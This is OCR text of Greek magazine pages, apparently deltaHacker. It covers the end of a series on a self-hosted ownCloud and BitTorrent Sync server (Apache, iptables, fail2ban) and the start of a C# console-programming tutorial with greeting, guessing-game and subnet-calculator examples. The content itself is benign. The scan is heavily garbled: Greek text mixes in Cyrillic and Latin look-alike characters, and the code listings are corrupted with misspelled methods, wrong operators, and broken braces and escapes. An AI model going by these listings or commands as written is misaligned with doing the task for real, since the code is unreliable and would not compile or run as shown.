admin@eyjafjallajokull:-$ sudo service apache2 restart 


* Restarting web server apache2 [ OK ] 
admin@eyjafjallajokull:-$ 
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О τελικός έλεγχος για то av όλα ἔχουν πάει καλά, γίνεται µε µια επίσκεψη στο 
ownCloud µέσω HTTPS (πχ. https://eyjafjallajokull.parabing.com). Δεν θα πρέπει va 
πάρουμε κάποια προειδοποίηση για TO πιστοποιητικό, ενώ µε κλικ πάνω στο σχετι- 
KÓ εικονίδιο του web browser θα δούμε και αναφορά σε ασφαλή σύνδεση. 


ajokull.parabing.com Gë Search A 4 H's] 


You are connected to 
parabing.com 


Verified by: StartCom Ltd. 


The connection to this website is secure. 


¿@ š 
οινωζίου 


admin 


Να συνδέεσαι στο ownCloud µέσω HTTPS και va σου εγγυώνται ότι η σύνδεση είναι 
ασφαλής: Ποιότητα! 


Μια ακόµα ρύθμιση για τον Apache 


Oa θυμόμαστε ἰσως ότι στο δεύτερο μέρος (Rttp://deltahacker.gr/actsubs- 
1srv2clouds-p23) της σειράς µας ρυθµίσαµε ro iptables ώστε va un δέχεται requests 
στο port 80. (Συγκεκριµένα, δέχεται requests µόνο στα ports 443/ΤΟΡ και 49250/ 
ТСР.) Εξ ορισμού, o Apache σερβίρει το ownCloud µέσω НТТР (port 443/TCP) αλλά 
και μέσω απλού HTTP (port 80/ TCP). Πα εξοικονόμηση πόρων, λοιπόν, καλό εἰναι να 
απενεργοποιήσουµε το “απλό” site. Av ρίξετε µια µατιά στον κατάλογο /etc/apache2/ 
sites-enabled, θα δείτε ότι ro configuration file για το απλό site, δηλαδή αυτό που 
σερβίρεται µέσω HTTP, είναι το 000-owncloud.conf. H απενεργοποίηση γίνεται έτσι: 


admin@eyjafjallajokull:-$ 

Site 000-owncloud disabled. 

To activate the new configuration, you need to run: 
service apache2 reload 

admin@eyjafjallajokull:-$ 
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* Reloading web server apache2 
admin@eyjafjallajokull:-$ 


Πολύ ωραία. 


Ώρα για το BitTorrent Sync 


H αλήθεια εἰναι ότι για το σκοπό που έχουµε φτιάξει ro VPS µε το ownCloud, που 
εἶναι η διαχείριση και το σερβίρισµα τευχών και βίντεο στους συνδρομητές του TE- 
ριοδικού, μπορούμε να ζήσουμε άνετα και χωρίς ro BitTorrent Sync: Δεν ανεβάζουμε 
κάθε μέρα νέα αρχεία στον file host µας, κι όποτε ανεβάζουμε επαληθεύουμε ότιτο 
FTP πάνω апо SSH (SFTP) εἶναι ότι πρέπει. Αλλά το BitTorrent Sync βολεύει τρομε- 
ра - ειδικά όσους θέλουν va απεμπλακούν από εμπορικές λύσεις τύπου Dropbox, 
One Drive κ.ά. Σκεφτείτε ότι έχουµε στη διάθεσή µας και τα buckets rou Storage 
Qloud, οπότε µε το BitTorrent Sync µας παρουσιάζεται µια πρώτης τάξεως ευκαιρία 
να αναπτύξουμε µια φθηνή κι ευέλικτη εναλλακτική rou Dropbox, επί της οποίας 
έχουμε απόλυτο έλεγχο. 


Με την εγκατάσταση του ВїїТоггепї Sync στο Ubuntu Server έχουµε ασχολη- 
θεί ξανά στο παρελθόν. Παρακολουθήστε, για παράδειγµα, το deltaCast 502604. 
(http://deltahacker.gr/deltacast-s02e04). Σήµερα υφίστανται κάποιες αλλαγές σε 
σχέση µε ότι δείχνουμε στο προαναφερθέν επεισόδιο, αφού στο web panel του 
BitTorrent Sync επιτρέπονται, πλέον, συνδέσεις HTTPS. Έτσι, σε αντίθεση µε ότι 
προτείναµε στο deltaCast 502604, στο Droplet µας δεν έχουµε τώρα εγκατεστημένο 
TO OpenVPN (Rhttp://deltahacker.gr/openvpn-revisited): Δεν το χρειαζόμαστε προκει- 
μένου va συνδεόµαστε ασφαλώς στο web panel του Sync. Βέβαια, ката τη ρύθμιση 
του Sync του επιτρέψαμε να δέχεται *uóvo* συνδέσεις HTTPS апо κάθε interface 
- και συγκεκριµένα στο port 8888/ TCP. Δείτε тоос προσθέσαμε έναν κατάλληλο 
κανόνα στο ruleset rou iptables, woTe να επιτρέπει συνδέσεις ото port 8888/ TCP: 


admin@eyjafjallajokull:-$ sudo service fail2ban stop 

* Stopping authentication failure monitor fail2ban [ OK ] 
admin@eyjafjallajokull:-$ sudo iptables -L --line-numbers 
Chain INPUT (policy ACCEPT) 


num target prot opt source destination 

1 ACCEPT all -- anywhere anywhere 

2 ACCEPT all -- anywhere anywhere ctstate 
RELATED,ESTABLISHED 

3 ACCEPT tcp -- anywhere anywhere tcp 

dpt :49250 

4 ACCEPT tcp -- anywhere anywhere tcp 
dpt:https 
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5 ΡΚΟΡ all -- anywhere anywhere 


Chain FORWARD (policy ACCEPT) 
num target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
num target prot opt source destination 


WV'HAGIKER 


adminGeyjafjallajokull:-$ sudo iptables -I INPUT 5 -p tcp --dport 8888 -j 


ACCEPT 
admingeyjafjallajokull:-$ sudo iptables -L --line-numbers 
Chain INPUT (policy ACCEPT) 


num target prot opt source destination 
1 ACCEPT all -- anywhere anywhere 

2 ACCEPT all -- anywhere anywhere 
RELATED,ESTABLISHED 

3 ACCEPT tcp -- anywhere anywhere 
dpt :49250 

4 ACCEPT tcp -- anywhere anywhere 
dpt:https 

5 ACCEPT tcp -- anywhere anywhere 

6 DROP all -- anywhere anywhere 


Chain FORWARD (policy ACCEPT) 
num target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 

num target prot opt source destination 
admingeyjafjallajokull:-$ sudo service iptables-persistent save 
* Saving rules... 

КОРУДЕ 

* Ἱρήθρου [EG ] 

admingeyjafjallajokull:-$ sudo service fail2ban start 

* Starting authentication failure monitor fail2ban [ OK ] 
admingeyjafjallajokull:-$ 
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ctstate 
tcp 
tcp 


tcp dpt:8888 
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Επειδή κατά την ενεργοποἰησή rou ro fail2ban εισάγει τους δικούς του κανόνες ото 
υπάρχον ruleset του iptables κι εμείς δεν θέλουμε διπλοεγγραφές ото /etc/iptables/ 
rules.v4, πριν προσθέσουμε τον κανόνα µας απενεργοποιήσαµε προσωρινά την υπη- 
peoia του fail2ban. Μετά ρἰξαµε µια ματιά στους εναπομείναντες κανόνες δίνοντας 
στο iptables τις παραμέτρους - και --line-numbers, шоте να δούμε πού ακριβώς 
πρέπει να εισαγάγουµε τον κανόνα για то port 8888/ΤΟΡ. H ζητούμενη θέση ήταν 
η 5, οπότε εισαγάγαµε εκεί το νέο κανόνα και µετά αποθηκεύσαµε το επαυξηµένο 
ruleset καλώντας την υπηρεσία iptables-persistent µε την οδηγία save. Τέλος, ενερ- 
γοποιήσαµε ξανά ro fail2ban. 


Σημείωση: Τις λίγες φορές που έχουµε λόγο να επισκεφθούμε то web panel 
TOU BitTorrent sync, avti στη μπάρα διευθύνσεων του browser να πληκτρολο- 
yoúpe τη διεύθυνση https://eyjafjallajokull.parabing.com:8888 γράφουμε κάτι 
σαν https://public_ip_address:8888. Το πιστοποιητικό του BitTorrent Sync web 
panel εἶναι self-signed και παίρνουμε σχετική προειδοποίηση, αλλά o' αυτή 
την περίπτωση καθόλου δεν µας ενοχλεί. Αν στη urtápa διευθύνσεων αντί για 
το IP δίναμε το domain name, επειδή о web browser έχει ήδη το δημόσιο πι- 
στοποιητικό TOU Apache για ro domain αλλά τώρα υπάρχει άλλος server στην 
άλλη άκρη, θεωρεί ότι πρόκειται για επίθεση MITM και δεν µας επιτρέπει να 
προχωρήσουμε. Σωστά πράττει. 


Η σειρά σας! 


Κάπως έτσι εἰναι ο file host µας σήµερα. Πα λίγο καιρό θα rov αφήσουμε στην ησυχία 
του, ξέρουμε όµως ότι αργά ἡ γρήγορα θα αρχίσουμε και πάλι τις αλλαγές. Όταν το 
κάνουμε και κρίνουμε πως έχουμε κάτι ενδιαφέρον να μοιραστούμε μαζί σας, να εἰ- 
στε βέβαιοι ότιδεν θαντραπούμε. Θέλουμε εξάλλου ναπιστεύουµε ὀτιμέσααπότα 
τρία άρθρα αυτής της σειράς θα εµπνευστείτε όσο χρειάζεται, WOTE να φτιάξετε κι 
εσείς τη δική σας πλατφόρμα ото cloud - ñ ακριβέστερα ora clouds. Оті κι αν απο- 
φασίσετε, όπως κι αν προχωρήσετε, σας ευχόμαστε καλή διασκέδαση. Θα χαρούμε 
μάλιστα πολύ αν επιστρέψετε για va µας παρουσιάσετε τα δηµιουργήµατά σας. Και 
μια τελευταία υπενθύμιση: Αν σκοπεύετε να φτιάξετε то VPS σας στη DigitalOcean, 
ξεκινήστε απὀ το ακόλουθο URL: 


http://bit.ly/digocean10off 


θα έχετε αυτομάτως 10 δολάρια έκπτωση για TO VPS, ενώ θα ελαφρύνετε και τα 
έξοδα hosting του αγαπημένου σας περιοδικού. 
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Skill: Intermediate 
Tags: .NET, C#, programming, console apps, Textual User Interface 


Ανάπτυξη εφαρμογών 
σε C# yuq To .NET 


by multiPetros 


H γνωριμία µας µε την C£ έχει προχωρήσει αρκετά. H μήπως оҳу; Н αλήθεια 
είναι ότι µια γνωριμία поо έχει µόνο θεωρητική υπόσταση δεν εἰναι πραγματική 
γνωριμία. Σ’ αυτό το άρθρο, λοιπόν, θα ασχοληθούμε µε τη C£ στην πράξη, 
δημιουργώντας µερικά απλά προγράµµατα για τη γραμμή εντολών. 


Μετάτην εκμάθηση των βασικών συστατικών της γλὠσσας καθώς kat тпс δηµιουρ- 
γίας βιβλιοθηκών, έχουµε πλέον φτάσει στη στιγµή που то 99,385% των αναγνω- 
στὠν ανέμενε µε ανυπομονησία апо το πρώτο κιόλας άρθρο της σειράς. Μιλάμε 
για τη δηµιουργία εκτελέσιµων προγραμμάτων, µε τα οποία ο χρήστης θα µπορεί 
να αλληλεπιδρά - ή και όχι ;) Για αρχή θα μείνουμε στο περιβάλλον της κονσόλας, 
δεσμευόμενοι (και όχι απλά υποσχόμενοι) ότι σύντομα θα προχωρήσουμε στην ανά- 
πτυξη παραθυρικών εφαρμογών. 


Konsolen über alles 


Н είσοδος και η έξοδος δεδοµένων προς την κονσόλα πραγματοποιείται µε Tn βοή- 
θεια της κλάσης Console, που ανήκει στο χώρο ονομάτων System. Н συγκεκριμένη 
κλάση εἶναι εφοδιασµένη µε µια πληθώρα μεθόδων και ιδιοτήτων, οι οποίες εκτός 
апо την απλή είσοδο και ἐξοδο συμβολοσειρών επιτρέπουν και τον πλήρη ἐλεγ- 
χο της κονσόλας. Αρκεί va σας πούμε ότι µε τη βοήθεια τη συγκεκριμένης κλάσης 
μπορεί κανείς να δημιουργήσει ακόµα και TUI (Textual User Interface) (> т.Е. Σχεδόν 
υποσυνείδητα, διάβασα "τουή”". Eni του παρόντος θα χρησιμοποιήσουμε τις µεθό- 
ὅους Read και Write, όπως επίσης και τις διάφορες παραλλαγές τους. To πρώτο µας 
παράδειγµα αποτελεί µια επέκταση του κλασικού "hello, world!", κατά την οποία το 
πρόγραµµα απευθύνει έναν προσωπικό χαιρετισμό στο χρήστη αφού πρῶτα ζητή- 
σει να μάθει то буора του. 

Πριν εξετάσουμε τον κὠδικατουπρογράμμµατοςθαρίξουµε μιαγρήγορη partá orn óc 
αδικασία δημιουργίας project για την κονσόλα, από το περιβάλλον rou SharpDevelop. 


Προφανώς, το πρώτο βήμα εἶναι να επιλέξουμε то New Solution, апо το μενού File. 
Στη συνέχεια, στο παράθυρο που εµφανίζεται επιλέγουμε το C# και αµέσως µετά 


БВ 


TITLE 


Β΄ Word finder | = m 


Type in any vords you find, press <ESC> to clear the line 


Found words: SAME HAPPEN SHAPE COMIC MURDER MUZZLE BROOM SPAR SPARE DAZZLE 


Ένα απλό παιχνίδι κρυπτόλεξου. To TUI του προγράµµατος δημιουργήθηκε µε τις 
"εργοστασιακές” μεθόδους που παρέχει η κλάση Console. 


το Windows Applications, ενώ από τη δεξιά περιοχή του παραθύρου κάνουμε κλικ 
στο Console Application. Κατόπιν, αρκεί να καθορίσουμε έναν κατάλογο για την απο- 
θήκευση rou project και, φυσικά, va του δώσουμε ένα буора. Μπορεί τα παραπάνω 
βήματα va μοιάζουν περίπλοκα για όσους δεν έχουν συνηθίσει να δουλεύουν ре IDE, 
αλλά av τα ακολουθήσετε µια-δυο φορές η διαδοχή των επιλογών που περιγράψα- 
ре 8' αρχίσει να σας φαίνεται λογική και απλή. 

Όπως έχουµε ξαναπεί, κάθε φορά που δημιουργούμε ένα project εμφανίζονται και 
λίγες γραμμές κώδικα, οι οποίες φιλοδοξούν να αποτελέσουν το σκελετό TOU προ- 
γράμματός µας. Апо τον κώδικα που εμφανίζεται αφαιρούμε όλες τις γραμμές που 
υπάρχουν µέσα στη μέθοδο Main της κλάσης Program, και στη θέση τους τοποθε- 
τούµε τα ακόλουθα: 


01 using System; 
02 namespace Name í 
03 class Program í 


04 public static void Main(string[] args) í 

05 string userName; 

06 Console.Title = "deltaHacker 042"; 

07 Console.Write("What's your name? "); 

08 userName = Console.ReadLine(); 

09 Console.WritelLine("Hello, " + userName + "!"); 
10 Console.WriteLine(); 

11 Console.Write("Press any key to continue... "); 
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12 Console.ReadKey(true); 
13 } 

14 } 

15} 


Στην πρώτη γραμμή παρατηρούμε την πρόταση using, η οποία επιτρέπει να χρησι- 
μοποιούμε τα αντικείµενα ενός εξωτερικού namespace. Στο πρόγραμμά µας, επιλέ- 
γουµε τη χρήση αντικειμένων από то χώρο ονομάτων System. Πρόκειται για έναν 
χώρο που χρησιμοποιούμε σχεδόν πάντα και περιέχει όλα та βασικά αντικείμενα 
TOU .NET. Στη δεύτερη γραμμή, µε τη βοήθεια της πρότασης namespace, ορίζεται το 
όνομα του δικού µας χώρου ονομάτων. Σε αυτή τη γραμμή το SharpDevelop τοποθέ- 
τησε αυτόματα ένα όνοµα και συγκεκριµένα το όνοµα rou Project µας. Όπως βλέπε- 
τε, επειδή δεν μπήκαμε στον κόπο να πληκτρολογήσουμε κάποιο буора, παρέμεινε 
η προεπιλογή (ένα σκέτο "Name"). Ακολούθως βλέπουμε τη δήλωση της κλάσης 
Program, που επίσης τοποθετήθηκε αυτόματα апо το SharpDevelop. Όπως έχουµε 
ξαναπεί, στη C# βρίσκονται та πάντα πίσω από αντικείμενα. Στη γραμμή 04 συνα- 


επ τε. 
5 ж m 


00 Windows Applications Notifyicon Windows User 
ËB ASP.NET icati “sesar Application Control Library 
"Un Compact Framework = 


Service 


=-Сщ VBNet 


A project that creates a command line application. 


Name: Name 
Location: CUsers user Desktop m 
Solution Name: Name Create directory for solution 
| Project will be created at C^ Users userNDesktopWame Name 


To SharpDevelop διευκολύνει σε µεγάλο βαθµό τη δηµιουργία νέων project, 
παρέχοντας πολλά template Κώδικα έτοιµα προς χρήση. 
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утаре τη μέθοδο Main, µε την οποία ξεκινάει κάθε πρόγραμμα. Ουσιαστικά, η συγκε- 
κριμένη γραμμή αποτελεί τη λεγόμενη υπογραφή της μεθόδου, που δεν είναι τίποτα 
άλλο апо το σύνολο των αναγνωριστικών (identifier) που την καθιστούν μοναδική: 
To буора тпс, ο τύπος δεδομένων που επιστρέφει και η Лота тоу παραμέτρων που 
δέχεται. Στο πρόγραμμά µας, η μέθοδος Main διαθέτει µόνο µια παράμετρο µε το 
буора args. Πρόκειται για έναν πίνακα που περιλαμβάνει όλες τις παραμέτρους που 
προέρχονται από το περιβάλλον εκτέλεσης του προγράμματος. Περιλαμβάνει, για 
παράδειγμα, τις παραμέτρους που έδωσε ο χρήστης στη γραμμή εντολών κατά την 
εκτέλεση του προγράμματος. 


Στη γραμμή 05 ξεκινάει ο δικός µας κώδικας, µε τη δήλωση µιας μεταβλητής τύπου 
string µε το όνοµα userName. Όπως καταλαβαίνετε, σε αυτήν θα αποθηκεύσουμε 
το όνομα του χρήστη, όπως θα ro πάρουμε από την κονσόλα. Στη συνέχεια κάνουμε 
χρήση της ιδιότητας Title του αντικειμένου Console, ώστε να ορίσουμε τον τίτλο 
του παραθύρου στο οποίο θα τρέχει το πρόγραμμά µας. Εάν δεν ορίσουμε εμείς ká- 
ποιο όνομα, ο τίτλος θα σχηματίζεται αυτόματα апо τη διαδρομή προς το πρόγραμ- 
μα. Η πρώτη µας (αληθινή) επαφή µε την κονσόλα πραγματοποιείται στη γραμμή 07, 
µε τη μέθοδο Write(). Με τη βοήθειά της εµφανίζουµε éva μήνυμα, προτρέποντας 
το χρήστη να δώσει το ὀνομά του. Η λήψη της εισόδου από το χρήστη επιτυγχάνε- 
ται µε τη μέθοδο ReadLine(), στη γραμμή 08. H εν λόγω μέθοδος διακόπτει τη ροή 
του προγράµµατος και περιμένει να πάρει από το χρήστη µια συμβολοσειρά. Όπως 
επισηµάναµε και νωρίτερα, η επιστρεφόµενη συμβολοσειρά αποθηκεύεται στη HE- 
ταβλητή userName. 


Στη συνέχεια εμφανίζουμε έναν προσωποποιηµένο χαιρετισμό, χρησιμοποιώντας 
αυτή τη φορά τη μέθοδο WriteLine(). H διαφορά της WriteLine απὀ τη Write, έγκειται 
στο ότι εισάγει αυτόματα στο τέλος του εκάστοτε string ένα χαρακτήρα αλλαγής 
γραμμής. Όπως καταλαβαίνετε, θα μπορούσαμε κάλλιστα να χρησιμοποιήσουμε τη 
μέθοδο Write, εισάγοντας την αλλαγή γραμμής χειροκίνητα (µε τον ειδικό χαρακτή- 
ра ^n^. Κάτι ακόµα που αξίζει να σημειώσουμε είναι η χρήση του τελεστή "+" yra TN 
συνένωση των τριών συμβολοσειρών. Στην πραγματικότητα δεν πρόκειται για έναν 
τελεστή, αλλά για µια συντόμευση προς τη μέθοδο String.Concat(x, y, ..). Στη 10η 
γραμμή βλέπουμε πάλι τη μέθοδο WriteLine(), αλλά χωρίς κάποια παράμετρο. Αυτό 
είναι έγκυρο και έχει ως αποτέλεσµα την εμφάνιση µιας κενής γραμμής. To (ðo 
αποτέλεσµα θα μπορούσαμε να πετύχουμε και µε μία μόνο εκτέλεση της WriteLine, 
εισάγοντας στο τέλος του String έναν χαρακτήρα αλλαγής γραμμής: 


Console.WriteLine("Hello, " + userName + "!\п"); 


Προσπερνώντας rn γραμμή 11, όπου χρησιμοποιείται και πάλι η γνωστή πλέον Write, 
συναντάμε τη μέθοδο ReadKey(). Н συγκεκριμένη μέθοδος δεν διαβάζει µια ολόκλη- 
pn συμβολοσειρά, αλλά έναν µόνο χαρακτήρα. Συγκεκριµένα, διακόπτει τη ροή του 
προγράµµατος και αναμένει το πάτηµα ενός οποιουδήποτε πλήκτρου. Μόλις διαπι- 
στωθεί κάτι τέτοιο, η μέθοδος ReadKey επιστρέφει µια δομή ConsoleKeylnfo' και 
επιτρέπει τη "φυσιολογική" εξέλιξη του προγράµµατος. Па τις ανάγκες του δικού 


i. Παρέχει µέλη που περιγράφουν το πλήκτρο nou πατήθηκε: κωδικό, αναπαράσταση Unicode, τροποποιητές ([Shift], [Alt], [Ctrl]) к.а. 
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Program.cs 


Ўз Name. Program X Ф Маіп(ѕігіпо[ args) 


патеѕрасе Мате{ 

[es = class Program{ 

* - public static void Main(string[] args)i 
string userName ; 
Console.Title - "deltaHacker 042" ; 
Console.Write("What's your name? ") ; 
userName - Console.ReadLine() ; 
Console.Writeline("Hello, " + userName + "!An") ; 
Console.Write("Press any key to continue . . . "); 
Console.ReadKey(true); 


» 
} а { deltaHacker 042 mms 


} What’s your name? Parabinger 
Hello, Parabingert* 


Press any key to continue . . . 


To πρώτο µας πρόγραμμα για την κονσόλα, µε φόντο TOV κώδικά TOU. 


μας προγράµµατος, πάντως, η επιστρεφόµενη δομή ConsoleKeylInfo δεν υποβάλλε- 
ται σε κανέναν ἐλεγχο. H μέθοδος ReadKey() χρησιμοποιείται μόνο και μόνο για την 
προσωρινή αναστολή εκτέλεσης του προγράµµατος. Αυτή η τεχνική είναι ιδιαίτε- 
ρα χρήσιμη, ειδικά όταν εκτελούµε το πρόγραμμά µας απευθείας από τον Windows 
Explorer. ?' αυτές τις περιπτώσεις, βλέπετε, μόλις τερματιστεί το πρόγραµµα το 
παράθυρο της κονσόλας κλείνει αµέσως και ο χρήστης δεν προλαβαίνει να δει τα 
μηνύματα που µπορεί va έχουν εμφανιστεί. Στην περίπτωση rou δικού µας προγράμ- 
ματος, χωρίς τη χρήση αυτής της ιδιότυπης υλοποίησης της pause, ο χρήστης δεν 
θα προλάβαινε να δει το χαιρετισμό που του απηύθυνε το πρόγραμμα. 


Κατεβάστε ένα πακέτο µε τον κώδικα από ro http://bit.ly/dh042-dnet-name. Όπως 
θα διαπιστώσετε, ο κώδικας περιλαμβάνει και κάποιες µικρές προσθήκες, αισθητι- 
κού περιεχοµένου. 


Ας παίξουμε! 


Επειδή το πρόγραµµα που εξετάσαµε µπορεί να σας φάνηκε βαρετό, το επόμενο 
παράδειγµα που θα δούµε αποτελεί éva απλοϊκό παιχνίδι µαντικών ικανοτήτων: O 
υπολογιστής Ва παράγει έναν τυχαίο αριθµό εντός κάποιον ορίων και ο χρήστης 
θα καλείται να rov µαντέψει. Το πρόγραµµα θα ενημερώνει το χρήστη για το αν 
πέτυχε τον αριθµό ñ για TO av ο μυστικός αριθµός είναι μεγαλύτερος ñ μικρότερος 


72 


TITLE 


апо αυτόν που ἐδωσε. Στο τέλος θα εμφανίζεται το σύνολο των προσπαθειών TOU 
χρήστη, έως ότου τα κατάφερε. Ας αφήσουμε όµως τις γενικές περιγραφές κι ας 
περάσουμε στον κώδικα. 


01 using System; 

02 

03 namespace бие$5{ 
04 class Programí 


05 public static void Main(string[] args)í 

06 Random rnd = new Random(); 

07 int compNum = rnd.Next(0, 21); 

08 int userNum; 

09 string userInput; 

10 int efforts - 0; 

11 bool found = false; 

12 Console.WriteLine("Mávteje ποιον αριθµό [1-20] έβαλα στο μυαλό 

[ους oye 

13 while (!found) í 

14 Console.Write("To: "); 

15 userInput = Console.ReadLine(); 

16 try í 

17 userNum = int.Parse(userInput); 

18 ) catch (Exception) í 

19 Console.WriteLine("To V"" * userInput * "V" δεν είναι 
έγκυρος ακέραιος αριθµός. ηλώσε έναν ακέραιο από то 1 έως 
100) 0) МП) 

20 continue; 

21 } 

22 

23 if(userNum > compNum)í 

24 Console.WriteLine("Eyu σκεφτεί μικρότερο αριθµό апо to "+ 
userNum.ToString()  "ληΔοκίμασε ξανά... in"); 

25 jelse if(userNum < сотрМит){ 

26 Console.WriteLine("Eyu σκεφτεί μεγαλύτερο αριθµό από το 
"+ userNum.ToString()  "ληλοκίμασε ξανά... in"); 

P }else{ 

28 Console.writeLine("Mnpáßo! Ακριβώς autó τον αριθµό είχα 
σκεφτεί !\п"); 

29 found = true; 
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30 } 

31 

32 efforts**; 

33 ) 

34 

35 Console.WriteLline("MávteUeG τον αριθµό µε " + efforts + " 
προσπάθειες. Vn"); 

36 

37 Console.Write("Press any key to continue . . . "); 

38 Console.ReadKey(true); 

39 ) 

40 ) 

41 } 


Σ’ αυτό το πρόγραµµα χρησιμοποιούμε τις δομές ελέγχου και επανάληψης της CZ, 
που γνωρίσαμε ото 20 µέρος της σειράς (http://deltahacker.gr/?p-13180), στο τεύ- 
χος 040 (http://deltahacker.gr/deltahacker040). O κώδικας δεν παρουσιάζει κάποια 
ιδιαιτερότητα, εκτός ίσως апо ορισμένα σηµεία-κλειδιά που θα εξετάσουμε ευθύς 
αμέσως. 


Στη γραμμή 06 βλέπουμε τη δημιουργία ενός αντικειμένου της κλάσης Random. 
Όπως φαντάζεστε, η συγκεκριμένη κλάση διευκολύνει την παραγωγή ψευδοτυχαί- 
ων αριθμών. Πα αυτή τη δουλειά ακριβώς, προφέρεται η μέθοδος Next(min, max). 
Προφανώς, οι δύο παράμετροι καθορίζουν το διάστηµα εντός του οποίου θα βρί- 
σκεται o τυχαίος αριθµός. Σημειώστε ότι το εν λόγω διάστηµα είναι ηµιανοικτό (το 
μέγεθος min περιλαμβάνεται στο διάστηµα, ενώ το μέγεθος max όχι). 


Μέσα στον κύριο βρόχο της μεθόδου Main, συναντάμε ένα μπλοκ "try — catch". Μέσα 
στο συγκεκριµένο μπλοκ αξιοποιείται η μέθοδος Parse, που μετατρέπει αριθµητι- 
κές συμβολοσειρές σε αριθμητικές τιμές. Το μπλοκ "try - catch" χρησιμοποιείται 
επειδή η είσοδος που λαμβάνουμε апо την κονσόλα ενδέχεται να µην είναι έγκυρη. 
Σε αυτή την περίπτωση θα προκληθεί κάποιο exception, το οποίο και θα πρέπει να 
χειριστούµε µε τη δέουσα προσοχή. Στο παράδειγμά µας, αν προκύψει κάποιο σφάλ- 
μα κατά τη μετατροπή εμφανίζεται éva μήνυμα που ενημερώνει σχετικά το χρήστη. 
Στη συνέχεια, µε rn βοήθειατης εντολής continue η τρέχουσα εκτέλεση του βρόχου 
διακόπτεται και ξεκινά µια νέα. Λίγο πιο κάτω, στις γραμμές 24 και 26, χρησιµοποι- 
ούμε τη μέθοδο ToString(). Αυτή η μέθοδος έχει την αντίστροφη λειτουργία апо την 
Parse nou είδαμε προηγουμένως και μετατρέπει έναν αριθµό oe string. Στον κωδικά 
μας, ενδέχεται να παρατηρήσατε ότι τόσο η Parse όσο και η ToString καλούνται ως 
μέθοδοι του αντικειμένου Int. Όπως έχουµε πει επανειλημμένως, στη Οὔ τα πάντα 
είναι αντικείμενα. Έτσι, οι ακέραιοι αριθμοί (Int), όπως και όλοι οιτύποι δεδοµένων, 
αποτελούν κλάσεις. Πάντως n μέθοδος ToString ενσωματώνεται αυτόματα σε όλα 
τα αντικείμενα που δημιουργούμε στη C£ και επιστρέφει µια συμβολοσειρά που 
αναπαριστά το εκάστοτε αντικείµενο. Η επικάλυψη και η υπερφόρτωση της συ- 
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γκεκριµένης μεθόδου βρίσκονται στη διακριτική ευχέρεια του εκάστοτε проүрар- 
µατιστή. Εάν ο προγραμματιστής δεν επικαλύψει την ToString µε κάποια δική του 
μέθοδο, επιστρέφεται ro namespace ото οποίο ανήκει η κλάση του εκάστοτε αντι- 
κειμένου. Όπως και µε ro προηγούμενο παράδειγµα, ёто και τώρα σας συνιστούμε 
ναπειραματιστείτε µε rov κὠδικα και να µην αρκεστείτε σε µια απλή αντιγραφή και 
εκτέλεση. Μπορείτε va rov κατεβάσετε апо ro http://bit.ly/dh042-dnet-guess. 


Συμπληρώνοντας το παζλ 


Μέχρι στιγμής έχουµε δει τη χρήση αντικειμένων апо тіс βασικές βιβλιοθήκες του 
συστήµατος. Αν και αυτές οι βιβλιοθήκες καλύπτουν ένα πραγματικά τεράστιο Á- 
ора των προγραμματιστικών µας αναγκών, πολλές φορές θα χρειαστεί va αξιοποι- 
ήσουµε πρόσθετες βιβλιοθήκες. Σε αυτό το παράδειγµα, λοιπόν, θα μελετήσουμε 
τον τρόπο εισαγωγής και χρήσης µιας βιβλιοθήκης που διανέμεται σε µεταγλωτ:- 
τισµένη µορφή (αρχείο DLL). Σκοπός µας είναι η δηµιουργία ενός προγράµµατος 
για την κονσόλα, το οποίο θα εμφανίζει πληροφορίες για τη διευθυνσιοδότηση του 
τοπικού δικτύου. Па την υλοποίηση του προγράμματος θα στηριχτούµε στη BIBAL 
οθήκη SubnettingCalcs, που έχει αναπτύξει ο γράφων. Μπορείτε να κατεβάσετε τη 
βιβλιοθήκη και τη σχετική τεκμηρίωση από ro http://www.multipetros.gr/?p=885. 


A Nateale - CharnNavalon, ci [5 
ΠΠ; Add Reference | 
1 [GAC | Projects NET Assembly Browser | COM = |юав® 5 
[Pr Select > x lF 
= ν] |5 
g E] 
^ |2 
@ Άνοιγμα E] 
^? j » месас » Netcalc [М ГА Αναζήτηση: Netcalc p E 
Οργάνωση v Νέος φάκελος. šE > Ш @ ἢ 
CERE Δ. Όνομα ΄ Ἡμερομηνία трот.. Τύπος 
Selected References ШШ Επιφάνεια εργασ J bin 
08 Στοιχεία λήψης, J obj 
(— хура 21 Πρόσφατες θέσε Ji Properties 
sa „ша А 1 SubnettingCalcs.dll Επέκταση 
τ: Βιβλιοθήκες 
H Бачы Е > 
Ὄνομα αρχείου: | SubnettingCalcs.dll v | | Assembly Files (*.exe;*.dll) v 
| Άνοιγμα Άκυρο. 
ν 
Επ] Projects | Тоо | < > 
[28 Errors [Ж] Output [9 Task List |Œ Definition View [[] Search Result 
[1] coll сһ1 INS 


H προσθήκη τρίτων βιβλιοθηκών oro SharpDevelop γίνεται 
πανεύκολα, από το παράθυρο Add Reference. 


Πα την κατασκευή του προγράµµατος ξεκινάμε δημιουργώντας ένα νέο project Kov- 
σόλας. Εμείς του δώσαμε το όνομα Netcalc. Στη συνέχεια, από το κεντρικό μενού 
του SharpDevelop επιλέγουμε το Project και πατάμε ro Add Reference. Από εκεί μπο- 
ρούμε va εισάγουµε αναφορές προς τις πρόσθετες βιβλιοθήκες που σκοπεύουμε 
να χρησιμοποιήσουμε. Στο παράθυρο που εµφανίζεται επιλέγουμε την καρτέλα 
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"МЕТ Assembly Browser" και κάνουμε κλικ στο κουμπί Browse. Έτσι, εμφανίζεται éva 
πλαίσιο διαλόγου από το οποίο πρέπει να πλοηγηθούµε ως το αρχείο DLL που θέ- 
λουµε να χρησιµοποιηθεί στο πρόγραμμά µας. Πα µεγαλύτερη ευκολία κατεβάσαμε 
τη μεταγλωττισμένη βιβλιοθήκη και αποθηκεύσαµε το αρχείο DLL στον κατάλογο 
TOU project. Μόλις ολοκληρώσουµε την προσθήκη της βιβλιοθήκης (πατώντας oro 
κουμπί OK) µεταφερόμαστε αυτόματα στο κύριο περιβάλλον του SharpDevelop. 
Εφόσον έχουν πάει όλα καλά, oro panel ονόματι Project και συγκεκριµένα oro 'δέ- 
утро" References θα έχει προστεθεί η βιβλιοθήκη SubnettingCalcs. Μετά από αυτή 
την απλή διαδικασία, μπορούμε πλέον να προχωρήσουμε στη συγγραφή του κώδικα 
της εφαρµογής µας. 


01 using System; 

02 using Multipetros; 
03 

04 namespace Меїса1с{ 
05 class Programí 


06 public static void Main(string[] args)í 

07 string ip; 

08 string netmask; 

09 SubnettingCalcs calc; 

10 

